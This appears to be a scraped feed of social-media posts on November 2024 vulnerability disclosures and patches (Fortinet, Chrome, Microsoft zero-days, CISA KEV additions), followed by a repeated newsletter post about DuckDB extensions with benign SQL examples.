The bug is tracked as CVE-2024-47574, and it earned a 7.8 out of 10 CVSS severity rating. It affects FortiClientWindows version 7.4.0, 7.2.4 through 7.2.0, 7.0.12 through 7.0.0, and 6.4.10 through 6.4.0. Fortinet patched the hole on Tuesday. https://www.theregister.com/2024/11/14/fortinet_vpn_authentication_bypass_bug/
##Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-13T00:30:48
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T00:30:48
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T00:30:48
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
1 repos
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:30:54
1 posts
1 repos
Additional Fortinet security advisories:
No mention of exploitation.
#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-12T21:30:53
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:30:52
1 posts
1 repos
Additional Fortinet security advisories:
No mention of exploitation.
#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-12T21:30:52
1 posts
1 repos
Additional Fortinet security advisories:
No mention of exploitation.
#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-12T21:30:52
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:30:52
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:30:52
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:30:52
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:30:52
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T18:31:06
3 posts
TrustedSec: EKUwu: Not just another AD CS ESC
The publicly disclosed zero-day CVE-2024-49019, (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability, appears to be the one mentioned in the 08 October 2024 blog post by TrustedSec. Dubbed "EKUwu," an attacker can craft a certificate signing request, or CSR, (using built-in default version 1 certificate templates) to include application policies that are preferred over the configured Extended Key Usage attributes specified in the template. The only requirement is enrollment rights, and it can be used to generate client authentication, certificate request agent, and codesigning certificates using the WebServer template.
According to the timeline, TrustedSec reported the vulnerability on 30 August and Microsoft Security Response Center responded on 28 September saying that "the default configuration was not vulnerable" but requested that they "hold off on publishing any details." UwU what's this? Cue the 08 October blog post disclosing the vulnerability and details.
h/t: @dreadpir8robots cc: @cR0w
#CVE_2024_49019 #zeroday #microsoft #EKUwu #cve #vulnerability
##Ref: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019
##Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities
#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-12T18:31:05
10 posts
1 repos
Microsoft has urgently patched two high-risk vulnerabilities actively targeted by attackers:
🔹 CVE-2024-43451 – Attackers can hijack user privileges by exposing NTLMv2 hash credentials, letting them authenticate as the user with a “pass the hash” attack.
🔹 CVE-2024-49039 – A Windows Task Scheduler flaw enabling attackers to escape AppContainer restrictions and gain elevated access.
⚠️ Immediate Action: Update your systems now to block these dangerous exploits!
##3rd Microsoft vuln this year (among the over a dozen over the years I'm tracking) of how a remote attacker can get a user's Windows password NT hashes without needing to be admin on the user's device. Your passwords need to be truly random...now!
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43451
##CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
#CVE_2024_43451 #UAC_0194
https://www.clearskysec.com/0d-vulnerability-exploited-in-the_wild/
The vulnerability in question, CVE-2024-43451 (CVSS score: 6.5), refers to an NTLM hash disclosure spoofing vulnerability that could be exploited to steal a user's NTLMv2 hash. It was patched by Microsoft earlier this week. https://thehackernews.com/2024/11/russian-hackers-exploit-new-ntlm-flaw.html
##How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) https://www.helpnetsecurity.com/2024/11/14/cve-2024-43451-exploited/ #ClearSkyCyberSecurity #spearphishing #vulnerability #WindowsServer #Don'tmiss #Hotstuff #malware #Ukraine #Windows #News #CVE
##ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability
ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.
#CVE_2024_43451 #vulnerability #eitw #activeexploitation #kev #uac0194 #russia #russiaukrainewar #ukraine #cyberespionage #cyberthreatintelligence #threatintel #cybersecurity #infosec #CTI #IOC #sparkRAT
##Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) https://www.helpnetsecurity.com/2024/11/12/cve-2024-43451-cve-2024-49039/ #MicrosoftDefender #ActiveDirectory #securityupdate #ImmersiveLabs #vulnerability #WindowsServer #PatchTuesday #TrendMicro #Don'tmiss #Microsoft #Hotstuff #OpenSSL #Tenable #Windows #Ivanti #0-day #News #CVE
##CVE ID: CVE-2024-43451
Vendor: Microsoft
Product: Windows
Date Added: 2024-11-12
Vulnerability: Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43451 ; https://nvd.nist.gov/vuln/detail/CVE-2024-43451
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-43451
CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities
#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-12T18:31:00
7 posts
1 repos
Microsoft has urgently patched two high-risk vulnerabilities actively targeted by attackers:
🔹 CVE-2024-43451 – Attackers can hijack user privileges by exposing NTLMv2 hash credentials, letting them authenticate as the user with a “pass the hash” attack.
🔹 CVE-2024-49039 – A Windows Task Scheduler flaw enabling attackers to escape AppContainer restrictions and gain elevated access.
⚠️ Immediate Action: Update your systems now to block these dangerous exploits!
##CVE-2024-49039 - Security Update Guide - Microsoft - Windows Task Scheduler Elevation of Privilege Vulnerability #SuggestedRead #devopsish https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49039
##Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) https://www.helpnetsecurity.com/2024/11/12/cve-2024-43451-cve-2024-49039/ #MicrosoftDefender #ActiveDirectory #securityupdate #ImmersiveLabs #vulnerability #WindowsServer #PatchTuesday #TrendMicro #Don'tmiss #Microsoft #Hotstuff #OpenSSL #Tenable #Windows #Ivanti #0-day #News #CVE
##CVE ID: CVE-2024-49039
Vendor: Microsoft
Product: Windows
Date Added: 2024-11-12
Vulnerability: Microsoft Windows Task Scheduler Privilege Escalation Vulnerability
Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-49039 ; https://nvd.nist.gov/vuln/detail/CVE-2024-49039
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-49039
Some fairly interesting stuff for this #PatchTuesday!
Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.
https://www.zerodayinitiative.com/blog/2024/11/12/the-november-2024-security-update-review
##CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities
#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-12T18:31:00
3 posts
1 repos
Microsoft Security Response Center (MSRC): CVE-2024-49040 (update)
MSRC temporarily paused the rollout of the update for CVE-2024-49040 (7.5 high, disclosed 12 November 2024) Microsoft Exchange Server Spoofing Vulnerability. According to the Exchange Team blog:
Known issues with this update
We are aware of customers having an issue with the Transport rules stopping periodically after this update is installed. Based on our initial investigation, this can happen to customers who use their own transport or DLP rules. If you are seeing this problem, you might have to uninstall the November SU until it is re-released.
We are continuing the investigation and are working on a permanent fix to address this issue. We will release it when ready. We have also paused the rollout of November 2024 SU to Windows / Microsoft Update. Customers who might not use Transport or DLP rules and did not run into the issue with rules, can continue using the November SU update.
#microsoft #CVE_2024_49040 #exchange #vulnerability #CVE #infosec #cybersecurity
##Takeaway from Solidlab security researcher Vsevolod Kokorin on CVE-2024-49040
https://www.bleepingcomputer.com/news/security/unpatched-microsoft-exchange-server-flaw-enables-spoofing-attacks/
Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities
#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-12T18:30:58
1 posts
@ryanaraine tweeted "👀 Interesting people reporting a very interesting bug 👀" over at the Bad Place™ and linked CVE-2024-43450 (7.5 high) Windows DNS Spoofing Vulnerability. The reporters are from "cnnic.cn" which is China Internet Network Information Center, affiliated with the Ministry of Industry and Information Technology.
I think he's implying that it's unusual for a PRC government institution affiliated with MIIT itself to report a widely impacting network vulnerability in a post-July 2021 “Regulations on the Management of Network Product Security Vulnerabilities” (RMSV). Maybe the attack complexity is too high to be worthwhile? CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
##updated 2024-11-08T21:34:54
1 posts
2 repos
We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:
- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093
Hit up viz.greynoise.io for deets + real/useful/timely blocklists.
CVE-2024-43093 is client-side, hence no coverage.
##updated 2024-11-08T21:33:52
7 posts
2 repos
Palo Alto Expedition Missing Authentication Vulnerability (CVE-2024-5910) https://fortiguard.fortinet.com/threat-signal-report/5575
##CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild https://cyble.com/blog/cisa-finds-palo-alto-networks-cve-2024-5910-exploited-in-the-wild/ #Cybernews
##CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild
The flaw is a missing authentication vulnerability that allows an attacker with network access to takeover Palo Alto Expedition’s admin account and...
🔗️ [Cyble] https://link.is.it/85zu1w
##The vulnerability is tracked as CVE-2024-5910 and it was patched by Palo Alto Networks in July. https://www.securityweek.com/palo-alto-networks-expedition-vulnerability-exploited-in-attacks-cisa-warns/
##Critical Palo Alto Networks Expedition bug exploited (CVE-2024-5910) https://www.helpnetsecurity.com/2024/11/08/cve-2024-5910/ #PaloAltoNetworks #vulnerability #Horizon3.ai #Don'tmiss #Hotstuff #News #CVE #PoC
##CISA Alerts Fed Agencies of Active Exploitation of Palo Alto Networks’ CVE-2024-5910 https://thecyberexpress.com/cisa-alerts-of-cve-2024-5910-exploitation/ #ExpeditionVulnerability #paloaltonetworks #TheCyberExpress #CVE-2024-5910 #Vulnerability #CyberNews #PaloAlto
##We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:
- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093
Hit up viz.greynoise.io for deets + real/useful/timely blocklists.
CVE-2024-43093 is client-side, hence no coverage.
##updated 2024-11-08T18:31:57
1 posts
Lovense's Lush 2 'massage' toy getting it's own CVE is hilarious
##updated 2024-11-08T13:55:32
1 posts
Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.
But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.
TL;DR
(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)
Quacking In The [g]Sheets
The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.
The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.
If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.
Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):
INSTALL gsheets FROM community;LOAD gsheets;
Basic usage patterns include:
-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);
The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)
” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.
I made a perma-copy of my OAuth’d access token:
LOAD gsheets;CREATE PERSISTENT SECRET ( TYPE gsheet, PROVIDER access_token, TOKEN 'yOUrToK3nH3re');
And, now we can look at the “schema”:
$ duckdb -json -c " LOAD gsheets; FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet = 'Sheet1' ) LIMIT 1" | jq[ { "Vendor": "Sophos", "Title": "Sophos SFOS SQL Injection Vulnerability", "CVE": "CVE-2020-12271", "CVSS": 9.8, "Date of NVD publication": "4/27/20", "Date of vendor advisory": "Unknown", "Used in ransomware attacks?": "Known", "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).", "Date added to KEV Catalog": "11/3/21", "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412", "Date of Known Exploitation": "Apr-20", "Threat actor": "Unknown", "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal", "Metasploit Module": "N", "GreyNoise (#of Malicious IPs Scanning)": 0.0, "Number of vulnerable devices": "?", "Number of impacted devices": "?", "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271" }]
And, perform normal ops on it:
$ duckdb -table -c "LOAD gsheets;FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet='Sheet1')SELECT Vendor, COUNT(Vendor) AS ctGROUP BY VendorORDER BY 2 DESC"+---------------------+----+| Vendor | ct |+---------------------+----+| Cisco | 72 || D-Link | 19 || Ivanti | 18 || Citrix | 16 || Fortinet | 13 || SonicWall | 10 || Zyxel | 9 || NETGEAR | 8 || Juniper | 6 || F5 | 6 || PANW | 5 || Sophos | 5 || DrayTek | 3 || Tenda | 3 || TP-Link | 2 || MikroTik | 2 || Dasan | 2 || Check Point | 1 || D-Link and TRENDnet | 1 || Barracuda | 1 || Netis | 1 || FatPipe | 1 || Arcadyan | 1 || Sumavision | 1 |+---------------------+----+
The extension has some notable constraints to consider:
These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.
The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.
My🦆Server
MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.
The system operates through dual interfaces — a MySQL wire protocol on port 13306
(for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432
. (for direct DuckDB SQL execution).
I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.
If you are a MySQL/MariaDB shop, this might be something to keep on the radar.
Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
Photo by Samson Andreea on Pexels.comThe DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.
By now, you should know how to install/load extensions:
INSTALL http_client FROM community;LOAD http_client;
The extension provides two main functions: http_get()
for GET requests and http_post()
for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.
The extension returns responses in a consistent format that includes:
The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.
The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.
We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.
We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):
CREATE TABLE yesterday AS (WITH __req AS ( SELECT http_get( 'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000' ) AS res ), __res AS ( SELECT UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') ) AS cves FROM __req ) FROM __res);
We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.
What that query returns is an array of deeply nexted JSON records:
FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│ cves ││ json │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith… │└──────────────────────────────────────────────────────────────────────────────┘
But DuckDB let’s us work with JSON pretty seamlessly.
It looks like the NVD contractors are milking their contract for all its worth:
FROM yesterdaySELECT cves->>'cve'->>'vulnStatus' AS vulnStatus, COUNT() AS ct, ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│ vulnStatus │ ct │ pct ││ varchar │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis │ 83 │ 65.87 ││ Received │ 34 │ 26.98 ││ Undergoing Analysis │ 9 │ 7.14 │└─────────────────────┴───────┴────────┘
You can add headers, and use getenv(var)
to fill in things like API keys.
This is a super fun extension to play with!
FIN
Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev
☮️
updated 2024-11-08T13:55:27
1 posts
Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.
But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.
TL;DR
(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)
Quacking In The [g]Sheets
The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.
The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.
If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.
Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):
INSTALL gsheets FROM community;LOAD gsheets;
Basic usage patterns include:
-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);
The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)
” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.
I made a perma-copy of my OAuth’d access token:
LOAD gsheets;CREATE PERSISTENT SECRET ( TYPE gsheet, PROVIDER access_token, TOKEN 'yOUrToK3nH3re');
And, now we can look at the “schema”:
$ duckdb -json -c " LOAD gsheets; FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet = 'Sheet1' ) LIMIT 1" | jq[ { "Vendor": "Sophos", "Title": "Sophos SFOS SQL Injection Vulnerability", "CVE": "CVE-2020-12271", "CVSS": 9.8, "Date of NVD publication": "4/27/20", "Date of vendor advisory": "Unknown", "Used in ransomware attacks?": "Known", "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).", "Date added to KEV Catalog": "11/3/21", "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412", "Date of Known Exploitation": "Apr-20", "Threat actor": "Unknown", "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal", "Metasploit Module": "N", "GreyNoise (#of Malicious IPs Scanning)": 0.0, "Number of vulnerable devices": "?", "Number of impacted devices": "?", "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271" }]
And, perform normal ops on it:
$ duckdb -table -c "LOAD gsheets;FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet='Sheet1')SELECT Vendor, COUNT(Vendor) AS ctGROUP BY VendorORDER BY 2 DESC"+---------------------+----+| Vendor | ct |+---------------------+----+| Cisco | 72 || D-Link | 19 || Ivanti | 18 || Citrix | 16 || Fortinet | 13 || SonicWall | 10 || Zyxel | 9 || NETGEAR | 8 || Juniper | 6 || F5 | 6 || PANW | 5 || Sophos | 5 || DrayTek | 3 || Tenda | 3 || TP-Link | 2 || MikroTik | 2 || Dasan | 2 || Check Point | 1 || D-Link and TRENDnet | 1 || Barracuda | 1 || Netis | 1 || FatPipe | 1 || Arcadyan | 1 || Sumavision | 1 |+---------------------+----+
The extension has some notable constraints to consider:
These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.
The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.
My🦆Server
MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.
The system operates through dual interfaces — a MySQL wire protocol on port 13306
(for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432
. (for direct DuckDB SQL execution).
I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.
If you are a MySQL/MariaDB shop, this might be something to keep on the radar.
Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
Photo by Samson Andreea on Pexels.comThe DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.
By now, you should know how to install/load extensions:
INSTALL http_client FROM community;LOAD http_client;
The extension provides two main functions: http_get()
for GET requests and http_post()
for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.
The extension returns responses in a consistent format that includes:
The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.
